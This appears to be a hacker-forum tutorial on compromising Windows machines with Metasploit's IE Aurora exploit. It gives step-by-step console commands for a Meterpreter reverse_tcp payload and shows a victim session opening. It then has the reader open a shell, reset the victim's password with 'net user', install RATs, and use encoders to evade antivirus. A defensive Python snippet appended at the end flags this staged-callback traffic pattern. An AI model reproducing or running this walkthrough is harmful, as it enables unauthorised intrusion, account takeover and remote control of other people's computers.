Hacking a Remote Computer or Web Server With Metasploit

Before continuing, read our Disclaimer

Before I start, let's look at what Metasploit is.
Metasploit is a penetration testing tool by Rapid7.

Download Metasploit here

Now install it.

Metasploit is an exploitation framework, written in Ruby.
It has a wide range of pre-developed exploits and a few useful applications like "nmap" attached to it. It was primarily developed for penetration testing, but it has now become a must-have tool for hackers.

So let's start hacking!
Start msfconsole: Start > Search > msfconsole
or in Linux: ./msfconsole
Start by typing
Code:
help
It will show all commands.
Some stuff about Metasploit.

Exploits are methods by which you can get into another system.
Payloads are what gets injected into other computers when you exploit them.

What can payloads do?
They can execute commands, or a special shell can function as a RAT (Meterpreter).

What are encoders?
Encoders prevent detection by anti-virus software.

Okay now to the serious stuff!

In the console, you can exploit other computers. Here I will show you the famous Internet Explorer Aurora hack.

#1 Windows IE Aurora
Type in the following commands:
Code:
msf > use exploit/windows/browser/ms10_002_aurora

msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_002_aurora) > set LHOST (your IP)

msf exploit(ms10_002_aurora) > set URIPATH /

msf exploit(ms10_002_aurora) > exploit
Now it will show output like this (but with your IP):

Code:
[*] Exploit running as background job.

[*] Started reverse handler on port 4444

[*] Local IP: http://192.168.0.151:8080/

[*] Server started.
P.S.: The server runs on Ruby on Rails, so you need to port forward. Don't know how? See here: Port Forward ME!!!

Open Internet Explorer on a vulnerable machine and enter the Local IP URL (i.e. the Local IP that Metasploit displayed; here it is http://192.168.0.151:8080/) into the browser. If the exploit succeeds, you should see a new session in the Metasploit console:
Code:
[*] Sending stage (723456 bytes)

[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
msf exploit(ie_aurora) > sessions -i 1

[*] Starting interaction with 1...
meterpreter > getuid

Server username: WINXP\PakH3X0r
Now type
Code:
shell
and you can toy with that computer!
P.S.: To change passwords:

Code:
net user [user_name] [new_password]
You can then install RATs or your favorite tool.
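
Seen from the network, the session above is a web fetch from the victim to port 8080, followed seconds later by a second connection to the same host on port 4444 that pulls down a 723456-byte stage. The following added example (not part of the original post) flags that sequence in flow records; the record format, port set, time window and byte threshold are assumptions, and the sample records are constructed from the addresses in the console output.

```python
import csv, io
from datetime import datetime, timedelta

# Constructed flow records (not from the original post); the first two rows
# mirror the addresses and ports in the console output shown in the article.
SAMPLE_FLOWS = """\
ts,src,sport,dst,dport,bytes_to_src
2010-02-01T10:00:00,192.168.0.166,1512,192.168.0.151,8080,18432
2010-02-01T10:00:03,192.168.0.166,1514,192.168.0.151,4444,723456
2010-02-01T10:00:05,192.168.0.170,2001,192.168.0.10,8080,5120
2010-02-01T10:00:09,192.168.0.170,2002,192.168.0.10,3306,2048
2010-02-01T10:07:00,192.168.0.170,2003,192.168.0.10,5000,900000
"""

WEB_PORTS = {80, 443, 8000, 8080, 8443}  # assumption: ports treated as web traffic
WINDOW = timedelta(seconds=60)           # assumption: correlation window
MIN_STAGE_BYTES = 100_000                # assumption: floor for a staged download


def parse_flows(text):
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        rows.append({
            "ts": datetime.fromisoformat(r["ts"]),
            "src": r["src"], "dst": r["dst"],
            "dport": int(r["dport"]), "bytes": int(r["bytes_to_src"]),
        })
    return sorted(rows, key=lambda f: f["ts"])


def find_staged_callbacks(flows):
    """Flag client->server pairs where a web fetch is followed, inside WINDOW,
    by a new connection to the same server on a non-web port that returns a
    large download to the client (browser exploit followed by a staged
    reverse connection)."""
    last_web = {}  # (src, dst) -> time of the most recent web-port flow
    alerts = []
    for f in flows:
        pair = (f["src"], f["dst"])
        if f["dport"] in WEB_PORTS:
            last_web[pair] = f["ts"]
            continue
        seen = last_web.get(pair)
        if seen and f["ts"] - seen <= WINDOW and f["bytes"] >= MIN_STAGE_BYTES:
            alerts.append((f["src"], f["dst"], f["dport"], f["bytes"]))
    return alerts
```

Only the 192.168.0.166 to 192.168.0.151:4444 flow is flagged; the other two non-web flows fail the byte threshold or fall outside the window.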
